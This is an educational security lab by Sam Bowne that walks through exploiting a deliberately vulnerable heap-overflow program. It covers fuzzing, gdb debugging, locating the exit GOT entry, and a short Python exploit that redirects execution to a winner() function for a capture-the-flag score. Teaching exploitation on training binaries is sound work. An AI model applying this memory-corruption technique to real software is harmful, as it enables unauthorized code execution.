ED 206: Heap Overflow via Data Overwrite (10 pts + 35 pts extra)

What You Need

A Google Cloud Debian 9 Linux machine, with these tools installed:

sudo apt update
sudo apt install build-essential gcc-multilib gdb -y
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

Purpose

To practice exploiting heap overflow vulnerability. Since the heap doesn't store anything that directly ends up in EIP, you must exploit the heap to change a return pointer.

Downloading & Running the Vulnerable Program

In aan SSH window, execute these commands:

wget -nv https://samsclass.info/127/proj/ED206.c
wget -nv https://samsclass.info/127/proj/ED206
chmod a+x ED206
./ED206 AA BB
The program downloads and runs, printing "and that's a wrap folks!", as shown below.

Viewing the Source Code

Execute this command:

cat ED206.c
As shown below, a structure named "internet" is defined, which contains an integer (4 bytes) and a pointer to a string (4 bytes).

There's a function named winner(). As you might expect, our goal is to execute that function.

The main() routine creates two objects of type "internet" on the heap with malloc().

Then it copies the two command-line arguments into the strings in those objects without checking the input length.

Fuzzing

Try strings of various lengths, as shown below. You will find that 24 bytes in the first parameter are sufficient to cause a crash.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.

gdb -q ./ED206
run AAAABBBBCCCCDDDDEEEEFFFF GGGG
info registers
x/2i $eip
As shown below, the program crashes with:

This means we can write to any memory location we wish, putting the data in place of 'GGGG' and the address in place of 'HHHH'.

Choosing a Write Address

Let's find an address to overwrite.

Execute this command:


disassemble main
Press Enter to move down to the end of the code, as shown below (your addresses will be different). There are two calls to strcpy, then one to puts, and one to exit.

Execute these commands to leave the debugger.


q
y
Let's view the Dynamic Relocation entries with objdump:

objdump -R ./ED206
As shown below, when I did it, the address of "exit" was stored at 0804990c.

Your address may be different. Make a note of the correct address on your system.

If we can write to that address, we can take over the program's execution when it calls "exit@plt".

Note: the "puts" address won't work because it contains "28" which is ascii for "(" and breaks the bash command line.

Disassembling winner()

Execute these commands:

gdb -q ./ED206
disassemble winner
q
As shown below, when I did it, this function started at address 0x080484ab.

Your address may be different. Make a note of the correct address on your system.

Writing a Python Exploit File


nano h11
In nano, enter this code, to overwrite the return pointer with the start of winner().

You will have to adjust the addresses to be correct for your system.


#!/usr/bin/python

# 0804990c exit
# 080484ab winner

print 'AAAABBBBCCCCDDDDEEEE' + '\x0c\x99\x04\x08' + ' ' +'\xab\x84\x04\x08' 

Save the file with Ctrl+X, Y, Enter.

Running the Exploit

Execute these commands:

chmod a+x h11
./ED206 $(./h11)

ED 206.1 Heap Exploit (10 pts)

The flag appears, covered by a green box in the image below.


ED 206.2: Exploiting a 32-Bit Server (15 pts extra)

This form sends a string to a remote server and runs it through a 32-bit server process.

Enter the strings directly, like AAA

The "debug" button runs the program inside gdb.

Redirect execution to the winner() function to see the flag.

Hint: %5c is a backslash, so to send it you must place %5c%5c into a URL.

ED 206.2: String Processor

First String:
Second String:

ED 206.3: Exploiting a 64-Bit Server (20 pts extra)

This form sends a string to a remote server and runs it through a 64-bit server process.

Enter the strings directly, like AAA

The "debug" button runs the program inside gdb.

Redirect execution to the winner() function to see the flag.

ED 206.3: String Processor

First String:
Second String:

Hint: %60 is a backtick, so to send it you must place %5c%60 into a URL.

Hint: You don't need to send any null bytes


Sources

https://www.vulnhub.com/series/exploit-exercises,11/#

https://csg.utdallas.edu/wp-content/uploads/2012/08/Heap-Based-Exploitation.pdf

https://www.mattandreko.com/2012/01/12/exploit-exercises-protostar-heap-1/


Posted 9-17-15 by Sam Bowne
Revised 2-14-17
-no-pie switch added 2-20-18
Minor formatting edits 2-23-18
Tested on Kali 2018.3x86 and it worked OK 9-22-18
Ported to Google Cloud 8-1-19
ED206.2 and ED206.3 added 9-20-19
Hints added for ED 206.3 2-29-2020